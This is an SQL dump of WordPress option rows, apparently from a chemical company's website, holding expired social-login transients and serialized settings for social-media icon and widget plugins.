INSERT INTO `wp_options` VALUES (577454, '_site_transient_timeout_browser_f16f36c9f0a7b352895c77d5bf31631f', '1479380910', 'no'); 
INSERT INTO `wp_options` VALUES (577456, '_site_transient_browser_f16f36c9f0a7b352895c77d5bf31631f', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:6:"Chrome";s:7:"version";s:12:"54.0.2840.71";s:10:"update_url";s:29:"https://www.google.com/chrome";s:7:"img_src";s:50:"https://s.wordpress.org/images/browsers/chrome.png";s:11:"img_src_ssl";s:48:"https://wordpress.org/images/browsers/chrome.png";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'no'); 
INSERT INTO `wp_options` VALUES (577497, '_site_transient_timeout_n_nextend58247dd72b9e54.75534213', '1478790119', 'no'); 
INSERT INTO `wp_options` VALUES (577498, '_site_transient_n_nextend58247dd72b9e54.75534213', '1', 'no'); 
INSERT INTO `wp_options` VALUES (577499, '_site_transient_timeout_nextend58247dd72b9e54.75534213_fb_state', '1478790119', 'no'); 
INSERT INTO `wp_options` VALUES (577500, '_site_transient_nextend58247dd72b9e54.75534213_fb_state', 'db3fe1f73466e9e8091c6ccc3e7ec3ed', 'no'); 
INSERT INTO `wp_options` VALUES (577501, '_site_transient_timeout_nextend58247dd72b9e54.75534213_fb_r', '1478790119', 'no'); 
INSERT INTO `wp_options` VALUES (577502, '_site_transient_nextend58247dd72b9e54.75534213_fb_r', 'https://www.miller-stephenson.com/my-account/lost-password/', 'no'); 
INSERT INTO `wp_options` VALUES (577512, '_site_transient_timeout_n_nextend58248c19d45b72.35170375', '1478793769', 'no'); 
INSERT INTO `wp_options` VALUES (577513, '_site_transient_n_nextend58248c19d45b72.35170375', '1', 'no'); 
INSERT INTO `wp_options` VALUES (577514, '_site_transient_timeout_nextend58248c19d45b72.35170375_google_r', '1478793770', 'no'); 
INSERT INTO `wp_options` VALUES (577515, '_site_transient_nextend58248c19d45b72.35170375_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (577538, 'wpseo_sitemap_2989_cache_validator', '51iNv', 'no'); 
INSERT INTO `wp_options` VALUES (577776, 'widget_powr_social_media_icons', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (577779, 'powr_token', 'b19eLmCJNH1478808642', 'yes'); 
INSERT INTO `wp_options` VALUES (577782, '_site_transient_timeout_n_nextend5824d7f2caeab9.50222714', '1478813186', 'no'); 
INSERT INTO `wp_options` VALUES (577783, '_site_transient_n_nextend5824d7f2caeab9.50222714', '1', 'no'); 
INSERT INTO `wp_options` VALUES (577784, '_site_transient_timeout_nextend5824d7f2caeab9.50222714_google_r', '1478813186', 'no'); 
INSERT INTO `wp_options` VALUES (577785, '_site_transient_nextend5824d7f2caeab9.50222714_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (577886, '_site_transient_timeout_n_nextend58254bd780f0f7.67375215', '1478842855', 'no'); 
INSERT INTO `wp_options` VALUES (577887, '_site_transient_n_nextend58254bd780f0f7.67375215', '1', 'no'); 
INSERT INTO `wp_options` VALUES (577888, '_site_transient_timeout_nextend58254bd780f0f7.67375215_google_r', '1478842855', 'no'); 
INSERT INTO `wp_options` VALUES (577889, '_site_transient_nextend58254bd780f0f7.67375215_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (577934, '_site_transient_timeout_n_nextend58259241013290.55137624', '1478860881', 'no'); 
INSERT INTO `wp_options` VALUES (577935, '_site_transient_n_nextend58259241013290.55137624', '1', 'no'); 
INSERT INTO `wp_options` VALUES (577936, '_site_transient_timeout_nextend58259241013290.55137624_fb_state', '1478860881', 'no'); 
INSERT INTO `wp_options` VALUES (577937, '_site_transient_nextend58259241013290.55137624_fb_state', 'a664dacbf3e7abbfde81a04f39fdaccb', 'no'); 
INSERT INTO `wp_options` VALUES (577938, '_site_transient_timeout_nextend58259241013290.55137624_fb_r', '1478860881', 'no'); 
INSERT INTO `wp_options` VALUES (577939, '_site_transient_nextend58259241013290.55137624_fb_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (577948, '_site_transient_timeout_n_nextend5825a306af2dd2.34097502', '1478865174', 'no'); 
INSERT INTO `wp_options` VALUES (577949, '_site_transient_n_nextend5825a306af2dd2.34097502', '1', 'no'); 
INSERT INTO `wp_options` VALUES (577950, '_site_transient_timeout_nextend5825a306af2dd2.34097502_fb_state', '1478865174', 'no'); 
INSERT INTO `wp_options` VALUES (577951, '_site_transient_nextend5825a306af2dd2.34097502_fb_state', '4d889f050e2e74313add660785344c58', 'no'); 
INSERT INTO `wp_options` VALUES (577952, '_site_transient_timeout_nextend5825a306af2dd2.34097502_fb_r', '1478865174', 'no'); 
INSERT INTO `wp_options` VALUES (577953, '_site_transient_nextend5825a306af2dd2.34097502_fb_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (577954, '_site_transient_timeout_n_nextend5825a307dff336.30390435', '1478865175', 'no'); 
INSERT INTO `wp_options` VALUES (577955, '_site_transient_n_nextend5825a307dff336.30390435', '1', 'no'); 
INSERT INTO `wp_options` VALUES (577956, '_site_transient_timeout_nextend5825a307dff336.30390435_fb_state', '1478865175', 'no'); 
INSERT INTO `wp_options` VALUES (577957, '_site_transient_nextend5825a307dff336.30390435_fb_state', '8511d7f0bdfb64149ca3312c1282e49f', 'no'); 
INSERT INTO `wp_options` VALUES (577958, '_site_transient_timeout_nextend5825a307dff336.30390435_fb_r', '1478865176', 'no'); 
INSERT INTO `wp_options` VALUES (577959, '_site_transient_nextend5825a307dff336.30390435_fb_r', 'https://www.miller-stephenson.com/my-account', 'no'); 
INSERT INTO `wp_options` VALUES (577960, '_site_transient_timeout_n_nextend5825a30a1a1f90.42076063', '1478865178', 'no'); 
INSERT INTO `wp_options` VALUES (577961, '_site_transient_n_nextend5825a30a1a1f90.42076063', '1', 'no'); 
INSERT INTO `wp_options` VALUES (577962, '_site_transient_timeout_nextend5825a30a1a1f90.42076063_google_r', '1478865178', 'no'); 
INSERT INTO `wp_options` VALUES (577963, '_site_transient_nextend5825a30a1a1f90.42076063_google_r', '', 'no'); 
INSERT INTO `wp_options` VALUES (577964, '_site_transient_timeout_n_nextend5825a30b33d248.76467085', '1478865179', 'no'); 
INSERT INTO `wp_options` VALUES (577965, '_site_transient_n_nextend5825a30b33d248.76467085', '1', 'no'); 
INSERT INTO `wp_options` VALUES (577966, '_site_transient_timeout_nextend5825a30b33d248.76467085_google_r', '1478865179', 'no'); 
INSERT INTO `wp_options` VALUES (577967, '_site_transient_nextend5825a30b33d248.76467085_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (578018, '_site_transient_timeout_n_nextend5825e57960e598.75022226', '1478882185', 'no'); 
INSERT INTO `wp_options` VALUES (578019, '_site_transient_n_nextend5825e57960e598.75022226', '1', 'no'); 
INSERT INTO `wp_options` VALUES (578020, '_site_transient_timeout_nextend5825e57960e598.75022226_fb_state', '1478882185', 'no'); 
INSERT INTO `wp_options` VALUES (578021, '_site_transient_nextend5825e57960e598.75022226_fb_state', '1ad9f8256457a427639841ff1f92d190', 'no'); 
INSERT INTO `wp_options` VALUES (578022, '_site_transient_timeout_nextend5825e57960e598.75022226_fb_r', '1478882185', 'no'); 
INSERT INTO `wp_options` VALUES (578023, '_site_transient_nextend5825e57960e598.75022226_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (578038, 'sfsi_plus_section1_options', 's:501:"a:12:{s:21:"sfsi_plus_rss_display";s:2:"no";s:23:"sfsi_plus_email_display";s:3:"yes";s:26:"sfsi_plus_facebook_display";s:3:"yes";s:25:"sfsi_plus_twitter_display";s:3:"yes";s:24:"sfsi_plus_google_display";s:3:"yes";s:23:"sfsi_plus_share_display";s:2:"no";s:25:"sfsi_plus_youtube_display";s:2:"no";s:27:"sfsi_plus_pinterest_display";s:2:"no";s:26:"sfsi_plus_linkedin_display";s:3:"yes";s:27:"sfsi_plus_instagram_display";s:2:"no";s:23:"sfsi_plus_houzz_display";s:2:"no";s:17:"sfsi_custom_files";s:0:"";}";', 'yes'); 
INSERT INTO `wp_options` VALUES (578039, 'sfsi_plus_section2_options', 's:1955:"a:39:{s:17:"sfsi_plus_rss_url";s:0:"";s:17:"sfsi_rss_blogName";s:0:"";s:18:"sfsi_rss_blogEmail";s:0:"";s:19:"sfsi_plus_rss_icons";s:9:"subscribe";s:19:"sfsi_plus_email_url";N;s:29:"sfsi_plus_facebookPage_option";s:3:"yes";s:26:"sfsi_plus_facebookPage_url";s:72:"https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/";s:29:"sfsi_plus_facebookLike_option";s:3:"yes";s:30:"sfsi_plus_facebookShare_option";s:3:"yes";s:26:"sfsi_plus_twitter_followme";s:3:"yes";s:32:"sfsi_plus_twitter_followUserName";s:11:"MSChemicals";s:27:"sfsi_plus_twitter_aboutPage";s:3:"yes";s:22:"sfsi_plus_twitter_page";s:3:"yes";s:25:"sfsi_plus_twitter_pageURL";s:31:"https://twitter.com/MSChemicals";s:31:"sfsi_plus_twitter_aboutPageText";s:82:"Hey, check out this cool site I found: www.yourname.com #Topic via@my_twitter_name";s:21:"sfsi_plus_google_page";s:3:"yes";s:24:"sfsi_plus_google_pageURL";s:49:"https://plus.google.com/u/0/117410548865501752177";s:27:"sfsi_plus_googleLike_option";s:3:"yes";s:28:"sfsi_plus_googleShare_option";s:3:"yes";s:25:"sfsi_plus_youtube_pageUrl";s:0:"";s:22:"sfsi_plus_youtube_page";s:0:"";s:24:"sfsi_plus_youtube_follow";s:0:"";s:20:"sfsi_plus_ytube_user";s:0:"";s:29:"sfsi_plus_youtubeusernameorid";s:4:"name";s:22:"sfsi_plus_ytube_chnlid";s:0:"";s:24:"sfsi_plus_pinterest_page";s:0:"";s:27:"sfsi_plus_pinterest_pageUrl";s:0:"";s:28:"sfsi_plus_pinterest_pingBlog";s:0:"";s:27:"sfsi_plus_instagram_pageUrl";s:0:"";s:23:"sfsi_plus_houzz_pageUrl";s:0:"";s:23:"sfsi_plus_linkedin_page";s:3:"yes";s:26:"sfsi_plus_linkedin_pageURL";s:67:"https://www.linkedin.com/company/miller-stephenson-chemical-company";s:25:"sfsi_plus_linkedin_follow";s:3:"yes";s:32:"sfsi_plus_linkedin_followCompany";i:0;s:28:"sfsi_plus_linkedin_SharePage";s:3:"yes";s:35:"sfsi_plus_linkedin_recommendBusines";s:2:"no";s:35:"sfsi_plus_linkedin_recommendCompany";s:0:"";s:37:"sfsi_plus_linkedin_recommendProductId";i:0;s:26:"sfsi_plus_CustomIcon_links";s:0:"";}";', 'yes'); 
INSERT INTO `wp_options` VALUES (578040, 'sfsi_plus_section3_options', 's:648:"a:14:{s:23:"sfsi_plus_actvite_theme";s:4:"thin";s:19:"sfsi_plus_mouseOver";s:2:"no";s:26:"sfsi_plus_mouseOver_effect";s:7:"fade_in";s:23:"sfsi_plus_shuffle_icons";s:2:"no";s:27:"sfsi_plus_shuffle_Firstload";s:2:"no";s:26:"sfsi_plus_shuffle_interval";s:2:"no";s:30:"sfsi_plus_shuffle_intervalTime";i:0;s:31:"sfsi_plus_specialIcon_animation";s:0:"";s:31:"sfsi_plus_specialIcon_MouseOver";s:2:"no";s:31:"sfsi_plus_specialIcon_Firstload";s:2:"no";s:37:"sfsi_plus_specialIcon_Firstload_Icons";s:3:"all";s:30:"sfsi_plus_specialIcon_interval";s:2:"no";s:34:"sfsi_plus_specialIcon_intervalTime";s:0:"";s:35:"sfsi_plus_specialIcon_intervalIcons";s:3:"all";}";', 'yes'); 
INSERT INTO `wp_options` VALUES (578041, 'sfsi_plus_section4_options', 's:2090:"a:46:{s:24:"sfsi_plus_display_counts";s:2:"no";s:29:"sfsi_plus_email_countsDisplay";s:2:"no";s:26:"sfsi_plus_email_countsFrom";s:6:"source";s:28:"sfsi_plus_email_manualCounts";s:2:"20";s:27:"sfsi_plus_rss_countsDisplay";s:2:"no";s:26:"sfsi_plus_rss_manualCounts";s:2:"20";s:27:"sfsi_plus_facebook_PageLink";s:0:"";s:32:"sfsi_plus_facebook_countsDisplay";s:2:"no";s:29:"sfsi_plus_facebook_countsFrom";s:6:"manual";s:31:"sfsi_plus_facebook_manualCounts";s:2:"20";s:31:"sfsi_plus_twitter_countsDisplay";s:2:"no";s:28:"sfsi_plus_twitter_countsFrom";s:6:"manual";s:30:"sfsi_plus_twitter_manualCounts";s:2:"20";s:24:"sfsi_plus_google_api_key";s:0:"";s:30:"sfsi_plus_google_countsDisplay";s:2:"no";s:27:"sfsi_plus_google_countsFrom";s:6:"manual";s:29:"sfsi_plus_google_manualCounts";s:2:"20";s:32:"sfsi_plus_linkedIn_countsDisplay";s:2:"no";s:29:"sfsi_plus_linkedIn_countsFrom";s:6:"manual";s:31:"sfsi_plus_linkedIn_manualCounts";s:2:"20";s:20:"sfsi_plus_ln_api_key";s:0:"";s:23:"sfsi_plus_ln_secret_key";s:0:"";s:29:"sfsi_plus_ln_oAuth_user_token";s:0:"";s:20:"sfsi_plus_ln_company";s:0:"";s:22:"sfsi_plus_youtube_user";s:0:"";s:27:"sfsi_plus_youtube_channelId";s:0:"";s:31:"sfsi_plus_youtube_countsDisplay";s:2:"no";s:28:"sfsi_plus_youtube_countsFrom";s:6:"manual";s:30:"sfsi_plus_youtube_manualCounts";s:2:"20";s:33:"sfsi_plus_pinterest_countsDisplay";s:2:"no";s:30:"sfsi_plus_pinterest_countsFrom";s:6:"manual";s:32:"sfsi_plus_pinterest_manualCounts";s:2:"20";s:24:"sfsi_plus_pinterest_user";s:0:"";s:25:"sfsi_plus_pinterest_board";s:0:"";s:30:"sfsi_plus_instagram_countsFrom";s:6:"manual";s:33:"sfsi_plus_instagram_countsDisplay";s:2:"no";s:32:"sfsi_plus_instagram_manualCounts";s:2:"20";s:24:"sfsi_plus_instagram_User";s:0:"";s:30:"sfsi_plus_shares_countsDisplay";s:2:"no";s:27:"sfsi_plus_shares_countsFrom";s:6:"manual";s:29:"sfsi_plus_shares_manualCounts";s:2:"20";s:29:"sfsi_plus_houzz_countsDisplay";s:2:"no";s:26:"sfsi_plus_houzz_countsFrom";s:6:"manual";s:28:"sfsi_plus_houzz_manualCounts";s:2:"20";s:29:"sfsi_plus_youtubeusernameorid";s:4:"name";s:22:"sfsi_plus_ytube_chnlid";s:0:"";}";', 'yes'); 
INSERT INTO `wp_options` VALUES (578042, 'sfsi_plus_section5_options', 's:1771:"a:39:{s:20:"sfsi_plus_icons_size";i:40;s:23:"sfsi_plus_icons_spacing";i:5;s:25:"sfsi_plus_icons_Alignment";s:4:"left";s:22:"sfsi_plus_icons_perRow";i:5;s:31:"sfsi_plus_follow_icons_language";s:12:"Follow_en_US";s:33:"sfsi_plus_facebook_icons_language";s:14:"Visit_us_en_US";s:32:"sfsi_plus_twitter_icons_language";s:14:"Visit_us_en_US";s:31:"sfsi_plus_google_icons_language";s:14:"Visit_us_en_US";s:24:"sfsi_plus_icons_language";s:5:"en_US";s:29:"sfsi_plus_icons_ClickPageOpen";s:3:"yes";s:21:"sfsi_plus_icons_float";s:2:"no";s:28:"sfsi_plus_disable_floaticons";s:2:"no";s:26:"sfsi_plus_disable_viewport";s:2:"no";s:29:"sfsi_plus_icons_floatPosition";s:12:"center-right";s:21:"sfsi_plus_icons_stick";s:2:"no";s:27:"sfsi_plus_rss_MouseOverText";s:0:"";s:29:"sfsi_plus_email_MouseOverText";s:15:"Follow by Email";s:31:"sfsi_plus_twitter_MouseOverText";s:7:"Twitter";s:32:"sfsi_plus_facebook_MouseOverText";s:8:"Facebook";s:30:"sfsi_plus_google_MouseOverText";s:7:"Google+";s:32:"sfsi_plus_linkedIn_MouseOverText";s:8:"LinkedIn";s:33:"sfsi_plus_pinterest_MouseOverText";s:0:"";s:31:"sfsi_plus_youtube_MouseOverText";s:0:"";s:29:"sfsi_plus_share_MouseOverText";s:0:"";s:33:"sfsi_plus_instagram_MouseOverText";s:0:"";s:29:"sfsi_plus_houzz_MouseOverText";s:0:"";s:27:"sfsi_plus_CustomIcons_order";s:0:"";s:23:"sfsi_plus_rssIcon_order";i:1;s:25:"sfsi_plus_emailIcon_order";i:2;s:28:"sfsi_plus_facebookIcon_order";i:3;s:26:"sfsi_plus_googleIcon_order";i:4;s:27:"sfsi_plus_twitterIcon_order";i:5;s:25:"sfsi_plus_shareIcon_order";i:6;s:27:"sfsi_plus_youtubeIcon_order";i:7;s:29:"sfsi_plus_pinterestIcon_order";i:8;s:29:"sfsi_plus_instagramIcon_order";i:10;s:25:"sfsi_plus_houzzIcon_order";i:11;s:28:"sfsi_plus_linkedinIcon_order";i:9;s:31:"sfsi_plus_custom_MouseOverTexts";s:0:"";}";', 'yes'); 
INSERT INTO `wp_options` VALUES (578043, 'sfsi_plus_section6_options', 's:343:"a:7:{s:22:"sfsi_plus_show_Onposts";s:2:"no";s:23:"sfsi_plus_show_Onbottom";s:2:"no";s:27:"sfsi_plus_icons_postPositon";s:6:"source";s:25:"sfsi_plus_icons_alignment";s:12:"center-right";s:27:"sfsi_plus_rss_countsDisplay";s:2:"no";s:25:"sfsi_plus_textBefor_icons";s:26:"Please follow and like us:";s:29:"sfsi_plus_icons_DisplayCounts";s:2:"no";}";', 'yes'); 
INSERT INTO `wp_options` VALUES (578044, 'sfsi_plus_section7_options', 's:741:"a:15:{s:20:"sfsi_plus_show_popup";s:2:"no";s:20:"sfsi_plus_popup_text";s:42:"Enjoy this blog? Please spread the word :)";s:32:"sfsi_plus_popup_background_color";s:7:"#eff7f7";s:28:"sfsi_plus_popup_border_color";s:7:"#f3faf2";s:32:"sfsi_plus_popup_border_thickness";s:1:"1";s:29:"sfsi_plus_popup_border_shadow";s:3:"yes";s:20:"sfsi_plus_popup_font";s:26:"Helvetica,Arial,sans-serif";s:24:"sfsi_plus_popup_fontSize";s:2:"30";s:25:"sfsi_plus_popup_fontStyle";s:6:"normal";s:25:"sfsi_plus_popup_fontColor";s:7:"#000000";s:22:"sfsi_plus_Show_popupOn";s:4:"none";s:30:"sfsi_plus_Show_popupOn_PageIDs";s:0:"";s:19:"sfsi_plus_Shown_pop";s:8:"ETscroll";s:29:"sfsi_plus_Shown_popupOnceTime";s:0:"";s:37:"sfsi_plus_Shown_popuplimitPerUserTime";s:0:"";}";', 'yes'); 
INSERT INTO `wp_options` VALUES (578045, 'sfsi_plus_section8_options', 's:1188:"a:27:{s:25:"sfsi_plus_show_via_widget";s:2:"no";s:23:"sfsi_plus_float_on_page";s:2:"no";s:29:"sfsi_plus_float_page_position";s:9:"top-right";s:31:"sfsi_plus_icons_floatMargin_top";i:0;s:34:"sfsi_plus_icons_floatMargin_bottom";i:0;s:32:"sfsi_plus_icons_floatMargin_left";i:0;s:33:"sfsi_plus_icons_floatMargin_right";i:0;s:29:"sfsi_plus_place_item_manually";s:2:"no";s:27:"sfsi_plus_show_item_onposts";s:2:"no";s:29:"sfsi_plus_display_button_type";s:16:"standard_buttons";s:25:"sfsi_plus_post_icons_size";i:40;s:28:"sfsi_plus_post_icons_spacing";i:5;s:22:"sfsi_plus_show_Onposts";s:2:"no";s:25:"sfsi_plus_textBefor_icons";s:26:"Please follow and like us:";s:25:"sfsi_plus_icons_alignment";s:4:"left";s:29:"sfsi_plus_icons_DisplayCounts";s:2:"no";s:30:"sfsi_plus_display_before_posts";s:2:"no";s:29:"sfsi_plus_display_after_posts";s:2:"no";s:34:"sfsi_plus_display_before_blogposts";s:2:"no";s:33:"sfsi_plus_display_after_blogposts";s:2:"no";s:17:"sfsi_plus_rectsub";s:3:"yes";s:16:"sfsi_plus_rectfb";s:3:"yes";s:16:"sfsi_plus_rectgp";s:3:"yes";s:17:"sfsi_plus_rectshr";s:2:"no";s:18:"sfsi_plus_recttwtr";s:3:"yes";s:19:"sfsi_plus_rectpinit";s:3:"yes";s:21:"sfsi_plus_rectfbshare";s:3:"yes";}";', 'yes'); 
INSERT INTO `wp_options` VALUES (578046, 'sfsi_plus_feed_id', '', 'yes'); 
INSERT INTO `wp_options` VALUES (578047, 'sfsi_plus_redirect_url', '', 'yes'); 
INSERT INTO `wp_options` VALUES (578048, 'sfsi_plus_installDate', '2016-11-11 03:50:16', 'yes'); 
INSERT INTO `wp_options` VALUES (578049, 'sfsi_plus_RatingDiv', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (578050, 'sfsi_plus_footer_sec', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (578051, 'sfsi_plus_activate', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (578052, 'sfsi_plus_instagram_sf_count', 's:104:"a:3:{s:4:"date";i:1483488000;s:18:"sfsi_plus_sf_count";s:1:"O";s:25:"sfsi_plus_instagram_count";s:0:"";}";', 'yes'); 
INSERT INTO `wp_options` VALUES (578053, 'widget_sfsi-plus-widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (578054, 'widget_sfsiplus_subscriber_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (578055, 'sfsi_plus_pluginVersion', '2.51', 'yes'); 
INSERT INTO `wp_options` VALUES (578056, 'sfsi_plus_show_notification', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (578057, 'sfsi_plus_show_notification_plugin', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (578058, 'sfsi_plus_section9_options', 's:1348:"a:26:{s:25:"sfsi_plus_form_adjustment";s:3:"yes";s:21:"sfsi_plus_form_height";s:3:"180";s:20:"sfsi_plus_form_width";s:3:"230";s:21:"sfsi_plus_form_border";s:3:"yes";s:31:"sfsi_plus_form_border_thickness";s:1:"1";s:27:"sfsi_plus_form_border_color";s:7:"#b5b5b5";s:25:"sfsi_plus_form_background";s:7:"#ffffff";s:27:"sfsi_plus_form_heading_text";s:23:"Get new posts by email:";s:27:"sfsi_plus_form_heading_font";s:26:"Helvetica,Arial,sans-serif";s:32:"sfsi_plus_form_heading_fontstyle";s:4:"bold";s:32:"sfsi_plus_form_heading_fontcolor";s:7:"#000000";s:31:"sfsi_plus_form_heading_fontsize";s:2:"16";s:32:"sfsi_plus_form_heading_fontalign";s:6:"center";s:25:"sfsi_plus_form_field_text";s:16:"Enter your email";s:25:"sfsi_plus_form_field_font";s:26:"Helvetica,Arial,sans-serif";s:30:"sfsi_plus_form_field_fontstyle";s:6:"normal";s:30:"sfsi_plus_form_field_fontcolor";s:7:"#000000";s:29:"sfsi_plus_form_field_fontsize";s:2:"14";s:30:"sfsi_plus_form_field_fontalign";s:6:"center";s:26:"sfsi_plus_form_button_text";s:9:"Subscribe";s:26:"sfsi_plus_form_button_font";s:26:"Helvetica,Arial,sans-serif";s:31:"sfsi_plus_form_button_fontstyle";s:4:"bold";s:31:"sfsi_plus_form_button_fontcolor";s:7:"#000000";s:30:"sfsi_plus_form_button_fontsize";s:2:"16";s:31:"sfsi_plus_form_button_fontalign";s:6:"center";s:32:"sfsi_plus_form_button_background";s:7:"#dedede";}";', 'yes'); 
INSERT INTO `wp_options` VALUES (578059, 'adding_plustags', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (578073, 'socialwidget_global_notification', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (578074, 'widget_social-widget', 'a:2:{s:12:"_multiwidget";i:1;i:3;a:110:{s:5:"title";s:10:"Follow Us!";s:4:"text";s:0:"";s:10:"imgcaption";s:12:"Follow Us on";s:9:"icon_size";s:2:"32";s:9:"icon_pack";s:7:"default";s:9:"animation";s:4:"fade";s:12:"icon_opacity";s:7:"default";s:6:"newtab";s:3:"yes";s:8:"nofollow";s:2:"on";s:9:"alignment";s:4:"left";s:14:"display_titles";N;s:13:"icons_per_row";s:4:"auto";s:11:"slugtargets";a:0:{}s:10:"slugtitles";a:0:{}s:8:"slugalts";a:0:{}s:9:"slugorder";a:0:{}s:8:"facebook";s:72:"https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/";s:10:"googleplus";s:49:"https://plus.google.com/u/0/117410548865501752177";s:7:"twitter";s:31:"https://twitter.com/MSChemicals";s:7:"myspace";s:8:"https://";s:10:"friendfeed";s:8:"https://";s:5:"orkut";s:8:"https://";s:5:"hyves";s:8:"https://";s:8:"linkedin";s:67:"https://www.linkedin.com/company/miller-stephenson-chemical-company";s:11:"asmallworld";s:8:"https://";s:6:"flickr";s:8:"https://";s:9:"instagram";s:8:"https://";s:6:"picasa";s:8:"https://";s:9:"pinterest";s:8:"https://";s:7:"youtube";s:8:"https://";s:7:"aboutme";s:8:"https://";s:2:"vk";s:8:"https://";s:7:"skyrock";s:8:"https://";s:5:"skype";s:8:"https://";s:4:"digg";s:8:"https://";s:6:"reddit";s:8:"https://";s:9:"delicious";s:8:"https://";s:7:"stumble";s:8:"https://";s:6:"tumblr";s:8:"https://";s:6:"github";s:8:"https://";s:4:"buzz";s:8:"https://";s:4:"talk";s:8:"https://";s:5:"vimeo";s:8:"https://";s:7:"blogger";s:8:"https://";s:9:"wordpress";s:8:"https://";s:4:"yelp";s:8:"https://";s:6:"lastfm";s:8:"https://";s:7:"pandora";s:8:"https://";s:7:"ustream";s:8:"https://";s:4:"imdb";s:8:"https://";s:4:"hulu";s:8:"https://";s:8:"flixster";s:8:"https://";s:10:"foursquare";s:8:"https://";s:6:"meetup";s:8:"https://";s:8:"plancast";s:8:"https://";s:10:"slideshare";s:8:"https://";s:10:"deviantart";s:8:"https://";s:6:"itunes";s:8:"https://";s:7:"live365";s:8:"https://";s:12:"digitaltunes";s:8:"https://";s:10:"soundcloud";s:8:"https://";s:8:"bandcamp";s:8:"https://";s:4:"etsy";s:8:"https://";s:3:"bbb";s:8:"https://";s:14:"merchantcircle";s:8:"https://";s:4:"ebay";s:8:"https://";s:5:"steam";s:8:"https://";s:8:"slashdot";s:8:"https://";s:9:"goodreads";s:8:"https://";s:10:"cuttingsme";s:8:"https://";s:7:"rss_url";s:8:"https://";s:9:"subscribe";s:7:"mailto:";s:11:"custom1name";s:0:"";s:11:"custom1icon";s:0:"";s:10:"custom1url";s:0:"";s:11:"custom2name";s:0:"";s:11:"custom2icon";s:0:"";s:10:"custom2url";s:0:"";s:11:"custom3name";s:0:"";s:11:"custom3icon";s:0:"";s:10:"custom3url";s:0:"";s:11:"custom4name";s:0:"";s:11:"custom4icon";s:0:"";s:10:"custom4url";s:0:"";s:11:"custom5name";s:0:"";s:11:"custom5icon";s:0:"";s:10:"custom5url";s:0:"";s:11:"custom6name";s:0:"";s:11:"custom6icon";s:0:"";s:10:"custom6url";s:0:"";s:11:"custom7name";s:0:"";s:11:"custom7icon";s:0:"";s:10:"custom7url";s:0:"";s:11:"custom8name";s:0:"";s:11:"custom8icon";s:0:"";s:10:"custom8url";s:0:"";s:11:"custom9name";s:0:"";s:11:"custom9icon";s:0:"";s:10:"custom9url";s:0:"";s:12:"custom10name";s:0:"";s:12:"custom10icon";s:0:"";s:11:"custom10url";s:0:"";s:12:"custom11name";s:0:"";s:12:"custom11icon";s:0:"";s:11:"custom11url";s:0:"";s:12:"custom12name";s:0:"";s:12:"custom12icon";s:0:"";s:11:"custom12url";s:0:"";s:14:"customiconsurl";s:56:"https://www.yoursite.com/wordpress/wp-content/your-icons";s:15:"customiconspath";s:19:"/path/to/your-icons";}}', 'yes'); 
INSERT INTO `wp_options` VALUES (578092, 'taxonomy_term_325', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (578117, 'wpseo_sitemap_1124_cache_validator', '5VVq4', 'no'); 
INSERT INTO `wp_options` VALUES (578172, '_site_transient_timeout_n_nextend582651bca37dd6.88938316', '1478909900', 'no'); 
INSERT INTO `wp_options` VALUES (578173, '_site_transient_n_nextend582651bca37dd6.88938316', '1', 'no'); 
INSERT INTO `wp_options` VALUES (578174, '_site_transient_timeout_nextend582651bca37dd6.88938316_google_r', '1478909900', 'no'); 
INSERT INTO `wp_options` VALUES (578175, '_site_transient_nextend582651bca37dd6.88938316_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (578219, '_site_transient_timeout_n_nextend58269a62891101.31187790', '1478928498', 'no'); 
INSERT INTO `wp_options` VALUES (578220, '_site_transient_n_nextend58269a62891101.31187790', '1', 'no'); 
INSERT INTO `wp_options` VALUES (578221, '_site_transient_timeout_nextend58269a62891101.31187790_fb_state', '1478928498', 'no'); 
INSERT INTO `wp_options` VALUES (578222, '_site_transient_nextend58269a62891101.31187790_fb_state', '51dbc924267950eb89ab8613723dba44', 'no'); 
INSERT INTO `wp_options` VALUES (578223, '_site_transient_timeout_nextend58269a62891101.31187790_fb_r', '1478928498', 'no'); 
INSERT INTO `wp_options` VALUES (578224, '_site_transient_nextend58269a62891101.31187790_fb_r', 'https://www.miller-stephenson.com/my-account', 'no'); 
INSERT INTO `wp_options` VALUES (578359, '_site_transient_timeout_n_nextend58272d904c2dc3.01395873', '1478966176', 'no'); 
INSERT INTO `wp_options` VALUES (578360, '_site_transient_n_nextend58272d904c2dc3.01395873', '1', 'no'); 
INSERT INTO `wp_options` VALUES (578361, '_site_transient_timeout_nextend58272d904c2dc3.01395873_google_r', '1478966176', 'no'); 
INSERT INTO `wp_options` VALUES (578362, '_site_transient_nextend58272d904c2dc3.01395873_google_r', 'https://www.miller-stephenson.com', 'no'); 
